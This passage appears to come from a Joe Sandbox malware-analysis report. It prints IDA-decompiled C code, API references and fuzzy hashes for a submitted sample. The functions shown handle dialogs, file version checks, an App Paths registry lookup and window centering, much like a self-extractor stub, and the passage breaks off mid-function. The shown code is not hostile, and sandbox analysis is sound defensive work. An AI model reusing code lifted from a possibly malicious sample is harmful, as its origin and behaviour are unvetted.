                                                                                                                                                                                                        0x00e834b2
                                                                                                                                                                                                        0x00e834c4
                                                                                                                                                                                                        0x00e834cb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e834cb
                                                                                                                                                                                                        0x00e83468
                                                                                                                                                                                                        0x00e8346e
                                                                                                                                                                                                        0x00e83474
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8347c
                                                                                                                                                                                                        0x00e8348c
                                                                                                                                                                                                        0x00e83490
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83496
                                                                                                                                                                                                        0x00e83484
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83486
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83486
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • EndDialog.USER32(?,?), ref: 00E83490
                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 00E8349A
                                                                                                                                                                                                        • SetWindowTextA.USER32(?,cent), ref: 00E834B2
                                                                                                                                                                                                        • SetDlgItemTextA.USER32(?,00000838), ref: 00E834C4
                                                                                                                                                                                                        • SetForegroundWindow.USER32(?), ref: 00E834CB
                                                                                                                                                                                                        • EndDialog.USER32(?,00000002), ref: 00E834D8
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Window$DialogText$DesktopForegroundItem
                                                                                                                                                                                                        • String ID: cent
                                                                                                                                                                                                        • API String ID: 852535152-3940384054
                                                                                                                                                                                                        • Opcode ID: 91fd191cccf1a8842f3e7d0b2ef39caf8276fe12df2b739070af2cbc7426cd80
                                                                                                                                                                                                        • Instruction ID: 816cb525e7639fbbaef9cbf19c8d4555e81f2fb5ee973e3e65969e5e256bd295
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 91fd191cccf1a8842f3e7d0b2ef39caf8276fe12df2b739070af2cbc7426cd80
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0901DE31241114AFEB272F76DC0C9AD3A60EB05B11F045022F96EB29A0CA308F41CB81
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 95%
                                                                                                                                                                                                        			E00E82AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t16;
                                                                                                                                                                                                        				int _t21;
                                                                                                                                                                                                        				char _t32;
                                                                                                                                                                                                        				intOrPtr _t34;
                                                                                                                                                                                                        				char* _t38;
                                                                                                                                                                                                        				char _t42;
                                                                                                                                                                                                        				char* _t44;
                                                                                                                                                                                                        				CHAR* _t52;
                                                                                                                                                                                                        				intOrPtr* _t55;
                                                                                                                                                                                                        				CHAR* _t59;
                                                                                                                                                                                                        				void* _t62;
                                                                                                                                                                                                        				CHAR* _t64;
                                                                                                                                                                                                        				CHAR* _t65;
                                                                                                                                                                                                        				signed int _t66;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t60 = __edx;
                                                                                                                                                                                                        				_t16 =  *0xe88004; // 0x18391fe1
                                                                                                                                                                                                        				_t17 = _t16 ^ _t66;
                                                                                                                                                                                                        				_v8 = _t16 ^ _t66;
                                                                                                                                                                                                        				_t65 = _a4;
                                                                                                                                                                                                        				_t44 = __edx;
                                                                                                                                                                                                        				_t64 = __ecx;
                                                                                                                                                                                                        				if( *((char*)(__ecx)) != 0) {
                                                                                                                                                                                                        					GetModuleFileNameA( *0xe89a3c,  &_v268, 0x104);
                                                                                                                                                                                                        					while(1) {
                                                                                                                                                                                                        						_t17 =  *_t64;
                                                                                                                                                                                                        						if(_t17 == 0) {
                                                                                                                                                                                                        							break;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t21 = IsDBCSLeadByte(_t17);
                                                                                                                                                                                                        						 *_t65 =  *_t64;
                                                                                                                                                                                                        						if(_t21 != 0) {
                                                                                                                                                                                                        							_t65[1] = _t64[1];
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						if( *_t64 != 0x23) {
                                                                                                                                                                                                        							L19:
                                                                                                                                                                                                        							_t65 = CharNextA(_t65);
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t64 = CharNextA(_t64);
                                                                                                                                                                                                        							if(CharUpperA( *_t64) != 0x44) {
                                                                                                                                                                                                        								if(CharUpperA( *_t64) != 0x45) {
                                                                                                                                                                                                        									if( *_t64 == 0x23) {
                                                                                                                                                                                                        										goto L19;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									E00E81680(_t65, E00E817C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                        									_t52 = _t65;
                                                                                                                                                                                                        									_t14 =  &(_t52[1]); // 0x2
                                                                                                                                                                                                        									_t60 = _t14;
                                                                                                                                                                                                        									do {
                                                                                                                                                                                                        										_t32 =  *_t52;
                                                                                                                                                                                                        										_t52 =  &(_t52[1]);
                                                                                                                                                                                                        									} while (_t32 != 0);
                                                                                                                                                                                                        									goto L17;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								E00E865E8( &_v268);
                                                                                                                                                                                                        								_t55 =  &_v268;
                                                                                                                                                                                                        								_t62 = _t55 + 1;
                                                                                                                                                                                                        								do {
                                                                                                                                                                                                        									_t34 =  *_t55;
                                                                                                                                                                                                        									_t55 = _t55 + 1;
                                                                                                                                                                                                        								} while (_t34 != 0);
                                                                                                                                                                                                        								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
                                                                                                                                                                                                        								if(_t38 != 0 &&  *_t38 == 0x5c) {
                                                                                                                                                                                                        									 *_t38 = 0;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								E00E81680(_t65, E00E817C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                        								_t59 = _t65;
                                                                                                                                                                                                        								_t12 =  &(_t59[1]); // 0x2
                                                                                                                                                                                                        								_t60 = _t12;
                                                                                                                                                                                                        								do {
                                                                                                                                                                                                        									_t42 =  *_t59;
                                                                                                                                                                                                        									_t59 =  &(_t59[1]);
                                                                                                                                                                                                        								} while (_t42 != 0);
                                                                                                                                                                                                        								L17:
                                                                                                                                                                                                        								_t65 =  &(_t65[_t52 - _t60]);
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t64 = CharNextA(_t64);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					 *_t65 = _t17;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00E86CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
                                                                                                                                                                                                        			}






















                                                                                                                                                                                                        0x00e82aac
                                                                                                                                                                                                        0x00e82ab7
                                                                                                                                                                                                        0x00e82abc
                                                                                                                                                                                                        0x00e82abe
                                                                                                                                                                                                        0x00e82ac3
                                                                                                                                                                                                        0x00e82ac6
                                                                                                                                                                                                        0x00e82ac9
                                                                                                                                                                                                        0x00e82ace
                                                                                                                                                                                                        0x00e82ae6
                                                                                                                                                                                                        0x00e82bdc
                                                                                                                                                                                                        0x00e82bdc
                                                                                                                                                                                                        0x00e82be0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e82af2
                                                                                                                                                                                                        0x00e82afc
                                                                                                                                                                                                        0x00e82b00
                                                                                                                                                                                                        0x00e82b05
                                                                                                                                                                                                        0x00e82b05
                                                                                                                                                                                                        0x00e82b0b
                                                                                                                                                                                                        0x00e82bca
                                                                                                                                                                                                        0x00e82bd1
                                                                                                                                                                                                        0x00e82b11
                                                                                                                                                                                                        0x00e82b18
                                                                                                                                                                                                        0x00e82b26
                                                                                                                                                                                                        0x00e82b99
                                                                                                                                                                                                        0x00e82bc8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e82b9b
                                                                                                                                                                                                        0x00e82bae
                                                                                                                                                                                                        0x00e82bb3
                                                                                                                                                                                                        0x00e82bb5
                                                                                                                                                                                                        0x00e82bb5
                                                                                                                                                                                                        0x00e82bb8
                                                                                                                                                                                                        0x00e82bb8
                                                                                                                                                                                                        0x00e82bba
                                                                                                                                                                                                        0x00e82bbb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e82bb8
                                                                                                                                                                                                        0x00e82b28
                                                                                                                                                                                                        0x00e82b2e
                                                                                                                                                                                                        0x00e82b33
                                                                                                                                                                                                        0x00e82b39
                                                                                                                                                                                                        0x00e82b3c
                                                                                                                                                                                                        0x00e82b3c
                                                                                                                                                                                                        0x00e82b3e
                                                                                                                                                                                                        0x00e82b3f
                                                                                                                                                                                                        0x00e82b55
                                                                                                                                                                                                        0x00e82b5d
                                                                                                                                                                                                        0x00e82b64
                                                                                                                                                                                                        0x00e82b64
                                                                                                                                                                                                        0x00e82b7a
                                                                                                                                                                                                        0x00e82b7f
                                                                                                                                                                                                        0x00e82b81
                                                                                                                                                                                                        0x00e82b81
                                                                                                                                                                                                        0x00e82b84
                                                                                                                                                                                                        0x00e82b84
                                                                                                                                                                                                        0x00e82b86
                                                                                                                                                                                                        0x00e82b87
                                                                                                                                                                                                        0x00e82bbf
                                                                                                                                                                                                        0x00e82bc1
                                                                                                                                                                                                        0x00e82bc1
                                                                                                                                                                                                        0x00e82b26
                                                                                                                                                                                                        0x00e82bda
                                                                                                                                                                                                        0x00e82bda
                                                                                                                                                                                                        0x00e82be6
                                                                                                                                                                                                        0x00e82be6
                                                                                                                                                                                                        0x00e82bf8

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00E82AE6
                                                                                                                                                                                                        • IsDBCSLeadByte.KERNEL32(00000000), ref: 00E82AF2
                                                                                                                                                                                                        • CharNextA.USER32(?), ref: 00E82B12
                                                                                                                                                                                                        • CharUpperA.USER32 ref: 00E82B1E
                                                                                                                                                                                                        • CharPrevA.USER32(?,?), ref: 00E82B55
                                                                                                                                                                                                        • CharNextA.USER32(?), ref: 00E82BD4
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 571164536-0
                                                                                                                                                                                                        • Opcode ID: 52c96eaa3f2bf9ed90a504ae39ad5b35849d3c10b95eaccc9f1d9e4b77f6a427
                                                                                                                                                                                                        • Instruction ID: 1ea758948aec939e1ee8f72595e5fa2d93bc61a457d3372e10d436e38e9098ad
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 52c96eaa3f2bf9ed90a504ae39ad5b35849d3c10b95eaccc9f1d9e4b77f6a427
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 344103745052455FEB16AF348C54AFD7BA99F52304F1800EEE9CEB7202DB358E8A8B60
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00E828E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
                                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                                        				char* _v12;
                                                                                                                                                                                                        				intOrPtr _v16;
                                                                                                                                                                                                        				void* _v20;
                                                                                                                                                                                                        				intOrPtr _v24;
                                                                                                                                                                                                        				int _v28;
                                                                                                                                                                                                        				char _v32;
                                                                                                                                                                                                        				void* _v36;
                                                                                                                                                                                                        				int _v40;
                                                                                                                                                                                                        				void* _v44;
                                                                                                                                                                                                        				intOrPtr _v48;
                                                                                                                                                                                                        				intOrPtr _v52;
                                                                                                                                                                                                        				intOrPtr _v56;
                                                                                                                                                                                                        				intOrPtr _v60;
                                                                                                                                                                                                        				intOrPtr _v64;
                                                                                                                                                                                                        				long _t68;
                                                                                                                                                                                                        				void* _t70;
                                                                                                                                                                                                        				void* _t73;
                                                                                                                                                                                                        				void* _t79;
                                                                                                                                                                                                        				void* _t83;
                                                                                                                                                                                                        				void* _t87;
                                                                                                                                                                                                        				void* _t88;
                                                                                                                                                                                                        				intOrPtr _t93;
                                                                                                                                                                                                        				intOrPtr _t97;
                                                                                                                                                                                                        				intOrPtr _t99;
                                                                                                                                                                                                        				int _t101;
                                                                                                                                                                                                        				void* _t103;
                                                                                                                                                                                                        				void* _t106;
                                                                                                                                                                                                        				void* _t109;
                                                                                                                                                                                                        				void* _t110;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_v12 = __edx;
                                                                                                                                                                                                        				_t99 = __ecx;
                                                                                                                                                                                                        				_t106 = 0;
                                                                                                                                                                                                        				_v16 = __ecx;
                                                                                                                                                                                                        				_t87 = 0;
                                                                                                                                                                                                        				_t103 = 0;
                                                                                                                                                                                                        				_v20 = 0;
                                                                                                                                                                                                        				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
                                                                                                                                                                                                        					L19:
                                                                                                                                                                                                        					_t106 = 1;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t62 = 0;
                                                                                                                                                                                                        					_v8 = 0;
                                                                                                                                                                                                        					while(1) {
                                                                                                                                                                                                        						_v24 =  *((intOrPtr*)(_t99 + 0x80));
                                                                                                                                                                                                        						if(E00E82773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
                                                                                                                                                                                                        							goto L20;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t11 =  &_v32; // 0xe83938
                                                                                                                                                                                                        						_t68 = GetFileVersionInfoSizeA(_v12, _t11);
                                                                                                                                                                                                        						_v28 = _t68;
                                                                                                                                                                                                        						if(_t68 == 0) {
                                                                                                                                                                                                        							_t99 = _v16;
                                                                                                                                                                                                        							_t70 = _v8 + _t99;
                                                                                                                                                                                                        							_t93 = _v24;
                                                                                                                                                                                                        							_t87 = _v20;
                                                                                                                                                                                                        							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
                                                                                                                                                                                                        								goto L18;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t103 = GlobalAlloc(0x42, _t68);
                                                                                                                                                                                                        							if(_t103 != 0) {
                                                                                                                                                                                                        								_t73 = GlobalLock(_t103);
                                                                                                                                                                                                        								_v36 = _t73;
                                                                                                                                                                                                        								if(_t73 != 0) {
                                                                                                                                                                                                        									_t16 =  &_v32; // 0xe83938
                                                                                                                                                                                                        									if(GetFileVersionInfoA(_v12,  *_t16, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                                                                                                                                                                                                        										L15:
                                                                                                                                                                                                        										GlobalUnlock(_t103);
                                                                                                                                                                                                        										_t99 = _v16;
                                                                                                                                                                                                        										L18:
                                                                                                                                                                                                        										_t87 = _t87 + 1;
                                                                                                                                                                                                        										_t62 = _v8 + 0x3c;
                                                                                                                                                                                                        										_v20 = _t87;
                                                                                                                                                                                                        										_v8 = _v8 + 0x3c;
                                                                                                                                                                                                        										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
                                                                                                                                                                                                        											continue;
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											goto L19;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										_t79 = _v44;
                                                                                                                                                                                                        										_t88 = _t106;
                                                                                                                                                                                                        										_v28 =  *((intOrPtr*)(_t79 + 0xc));
                                                                                                                                                                                                        										_t101 = _v28;
                                                                                                                                                                                                        										_v48 =  *((intOrPtr*)(_t79 + 8));
                                                                                                                                                                                                        										_t83 = _v8 + _v16 + _v24 + 0x94;
                                                                                                                                                                                                        										_t97 = _v48;
                                                                                                                                                                                                        										_v36 = _t83;
                                                                                                                                                                                                        										_t109 = _t83;
                                                                                                                                                                                                        										do {
                                                                                                                                                                                                        											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E00E82A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
                                                                                                                                                                                                        											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E00E82A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
                                                                                                                                                                                                        											_t109 = _t109 + 0x18;
                                                                                                                                                                                                        											_t88 = _t88 + 4;
                                                                                                                                                                                                        										} while (_t88 < 8);
                                                                                                                                                                                                        										_t87 = _v20;
                                                                                                                                                                                                        										_t106 = 0;
                                                                                                                                                                                                        										if(_v56 < 0 || _v64 > 0) {
                                                                                                                                                                                                        											if(_v52 < _t106 || _v60 > _t106) {
                                                                                                                                                                                                        												GlobalUnlock(_t103);
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												goto L15;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											goto L15;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						goto L20;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				L20:
                                                                                                                                                                                                        				 *_a8 = _t87;
                                                                                                                                                                                                        				if(_t103 != 0) {
                                                                                                                                                                                                        					GlobalFree(_t103);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t106;
                                                                                                                                                                                                        			}

































                                                                                                                                                                                                        0x00e828f1
                                                                                                                                                                                                        0x00e828f4
                                                                                                                                                                                                        0x00e828f7
                                                                                                                                                                                                        0x00e828f9
                                                                                                                                                                                                        0x00e828fc
                                                                                                                                                                                                        0x00e828ff
                                                                                                                                                                                                        0x00e82901
                                                                                                                                                                                                        0x00e82907
                                                                                                                                                                                                        0x00e82a62
                                                                                                                                                                                                        0x00e82a64
                                                                                                                                                                                                        0x00e8290d
                                                                                                                                                                                                        0x00e8290d
                                                                                                                                                                                                        0x00e8290f
                                                                                                                                                                                                        0x00e82912
                                                                                                                                                                                                        0x00e82920
                                                                                                                                                                                                        0x00e82937
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8293d
                                                                                                                                                                                                        0x00e82944
                                                                                                                                                                                                        0x00e8294a
                                                                                                                                                                                                        0x00e8294f
                                                                                                                                                                                                        0x00e82a2f
                                                                                                                                                                                                        0x00e82a32
                                                                                                                                                                                                        0x00e82a34
                                                                                                                                                                                                        0x00e82a37
                                                                                                                                                                                                        0x00e82a41
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e82955
                                                                                                                                                                                                        0x00e8295e
                                                                                                                                                                                                        0x00e82962
                                                                                                                                                                                                        0x00e82969
                                                                                                                                                                                                        0x00e8296f
                                                                                                                                                                                                        0x00e82974
                                                                                                                                                                                                        0x00e8297e
                                                                                                                                                                                                        0x00e8298c
                                                                                                                                                                                                        0x00e82a20
                                                                                                                                                                                                        0x00e82a21
                                                                                                                                                                                                        0x00e82a27
                                                                                                                                                                                                        0x00e82a4c
                                                                                                                                                                                                        0x00e82a4f
                                                                                                                                                                                                        0x00e82a50
                                                                                                                                                                                                        0x00e82a53
                                                                                                                                                                                                        0x00e82a56
                                                                                                                                                                                                        0x00e82a5c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e829b2
                                                                                                                                                                                                        0x00e829b2
                                                                                                                                                                                                        0x00e829b5
                                                                                                                                                                                                        0x00e829bd
                                                                                                                                                                                                        0x00e829c3
                                                                                                                                                                                                        0x00e829cc
                                                                                                                                                                                                        0x00e829d5
                                                                                                                                                                                                        0x00e829d7
                                                                                                                                                                                                        0x00e829da
                                                                                                                                                                                                        0x00e829dd
                                                                                                                                                                                                        0x00e829df
                                                                                                                                                                                                        0x00e829ec
                                                                                                                                                                                                        0x00e829f8
                                                                                                                                                                                                        0x00e829fc
                                                                                                                                                                                                        0x00e829ff
                                                                                                                                                                                                        0x00e82a02
                                                                                                                                                                                                        0x00e82a07
                                                                                                                                                                                                        0x00e82a0a
                                                                                                                                                                                                        0x00e82a0f
                                                                                                                                                                                                        0x00e82a19
                                                                                                                                                                                                        0x00e82a81
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e82a0f
                                                                                                                                                                                                        0x00e8298c
                                                                                                                                                                                                        0x00e82974
                                                                                                                                                                                                        0x00e82962
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8294f
                                                                                                                                                                                                        0x00e82912
                                                                                                                                                                                                        0x00e82a65
                                                                                                                                                                                                        0x00e82a68
                                                                                                                                                                                                        0x00e82a6c
                                                                                                                                                                                                        0x00e82a6f
                                                                                                                                                                                                        0x00e82a6f
                                                                                                                                                                                                        0x00e82a7d

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GlobalFree.KERNEL32 ref: 00E82A6F
                                                                                                                                                                                                          • Part of subcall function 00E82773: CharUpperA.USER32(18391FE1,00000000,00000000,00000000), ref: 00E827A8
                                                                                                                                                                                                          • Part of subcall function 00E82773: CharNextA.USER32(0000054D), ref: 00E827B5
                                                                                                                                                                                                          • Part of subcall function 00E82773: CharNextA.USER32(00000000), ref: 00E827BC
                                                                                                                                                                                                          • Part of subcall function 00E82773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00E82829
                                                                                                                                                                                                          • Part of subcall function 00E82773: RegQueryValueExA.ADVAPI32(?,00E81140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00E82852
                                                                                                                                                                                                          • Part of subcall function 00E82773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00E82870
                                                                                                                                                                                                          • Part of subcall function 00E82773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00E828A0
                                                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00E83938,?,?,?,?,-00000005), ref: 00E82958
                                                                                                                                                                                                        • GlobalLock.KERNEL32 ref: 00E82969
                                                                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00E83938,?,?,?,?,-00000005,?), ref: 00E82A21
                                                                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00E83938,?,?), ref: 00E82A81
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                                                                                                                                                                        • String ID: 89
                                                                                                                                                                                                        • API String ID: 3949799724-2925746602
                                                                                                                                                                                                        • Opcode ID: f371d4dfc8e0e6cb5a7224c1248a80efc334163e6d176b6c380aeb426909f49d
                                                                                                                                                                                                        • Instruction ID: 458b63b3f15ba414027a4693826a1c9635a429a997f2d3df9d7b738de62dca7f
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f371d4dfc8e0e6cb5a7224c1248a80efc334163e6d176b6c380aeb426909f49d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: AD510831900219DFDB25EF99D884AAEBBB5FF48704F14506AEA1DF3211D7319941DB90
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                                                                                        			E00E843D0(struct HWND__* __ecx, struct HWND__* __edx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				struct tagRECT _v24;
                                                                                                                                                                                                        				struct tagRECT _v40;
                                                                                                                                                                                                        				struct HWND__* _v44;
                                                                                                                                                                                                        				intOrPtr _v48;
                                                                                                                                                                                                        				int _v52;
                                                                                                                                                                                                        				intOrPtr _v56;
                                                                                                                                                                                                        				int _v60;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t29;
                                                                                                                                                                                                        				void* _t53;
                                                                                                                                                                                                        				intOrPtr _t56;
                                                                                                                                                                                                        				int _t59;
                                                                                                                                                                                                        				struct HWND__* _t63;
                                                                                                                                                                                                        				struct HWND__* _t67;
                                                                                                                                                                                                        				struct HWND__* _t68;
                                                                                                                                                                                                        				struct HDC__* _t69;
                                                                                                                                                                                                        				int _t72;
                                                                                                                                                                                                        				signed int _t74;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t63 = __edx;
                                                                                                                                                                                                        				_t29 =  *0xe88004; // 0x18391fe1
                                                                                                                                                                                                        				_v8 = _t29 ^ _t74;
                                                                                                                                                                                                        				_t68 = __edx;
                                                                                                                                                                                                        				_v44 = __ecx;
                                                                                                                                                                                                        				GetWindowRect(__ecx,  &_v40);
                                                                                                                                                                                                        				_t53 = _v40.bottom - _v40.top;
                                                                                                                                                                                                        				_v48 = _v40.right - _v40.left;
                                                                                                                                                                                                        				GetWindowRect(_t68,  &_v24);
                                                                                                                                                                                                        				_v56 = _v24.bottom - _v24.top;
                                                                                                                                                                                                        				_t69 = GetDC(_v44);
                                                                                                                                                                                                        				_v52 = GetDeviceCaps(_t69, 8);
                                                                                                                                                                                                        				_v60 = GetDeviceCaps(_t69, 0xa);
                                                                                                                                                                                                        				ReleaseDC(_v44, _t69);
                                                                                                                                                                                                        				_t56 = _v48;
                                                                                                                                                                                                        				asm("cdq");
                                                                                                                                                                                                        				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
                                                                                                                                                                                                        				_t67 = 0;
                                                                                                                                                                                                        				if(_t72 >= 0) {
                                                                                                                                                                                                        					_t63 = _v52;
                                                                                                                                                                                                        					if(_t72 + _t56 > _t63) {
                                                                                                                                                                                                        						_t72 = _t63 - _t56;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t72 = _t67;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				asm("cdq");
                                                                                                                                                                                                        				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                                                                                                                                                                                                        				if(_t59 >= 0) {
